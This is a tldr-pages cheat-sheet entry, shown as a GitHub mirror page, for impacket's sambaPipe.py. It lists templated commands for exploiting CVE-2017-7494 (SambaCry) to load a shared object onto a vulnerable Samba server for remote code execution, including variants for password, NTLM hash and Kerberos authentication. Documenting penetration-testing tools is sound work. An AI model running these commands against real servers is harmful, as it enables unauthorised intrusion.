1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-08-24 14:44:14 +02:00
tldr/pages/common/sambapipe.py.md
Machiavelli 950791e1a2
sambaPipe.py, impacket-sambaPipe: add page (#17728)
* sambaPipe.py, impacket-sambaPipe: add page

* Fix

* :o

* 1

* 2
2025-08-22 06:24:30 +03:00

995 B

sambaPipe.py

Exploit CVE-2017-7494 (SambaCry) to upload and load a shared object (SO) file on a vulnerable Samba server for remote code execution. More information: https://github.com/fortra/impacket.

  • Upload and load a shared object file on a vulnerable Samba server:

sambaPipe.py -so {{path/to/file.so}} {{domain}}/{{username}}:{{password}}@{{target}}

  • Authenticate using NTLM hashes instead of a password:

sambaPipe.py -so {{path/to/file.so}} -hashes {{LM_HASH:NT_HASH}} {{domain}}/{{username}}:{{password}}@{{target}}

  • Use Kerberos authentication for the target:

sambaPipe.py -so {{path/to/file.so}} -k -no-pass {{domain}}/{{username}}:{{password}}@{{target}}

  • Specify a domain controller IP for authentication:

sambaPipe.py -so {{path/to/file.so}} -dc-ip {{dc_ip}} {{domain}}/{{username}}:{{password}}@{{target}}

  • Use a custom port for the SMB connection:

sambaPipe.py -so {{path/to/file.so}} -port {{port}} {{domain}}/{{username}}:{{password}}@{{target}}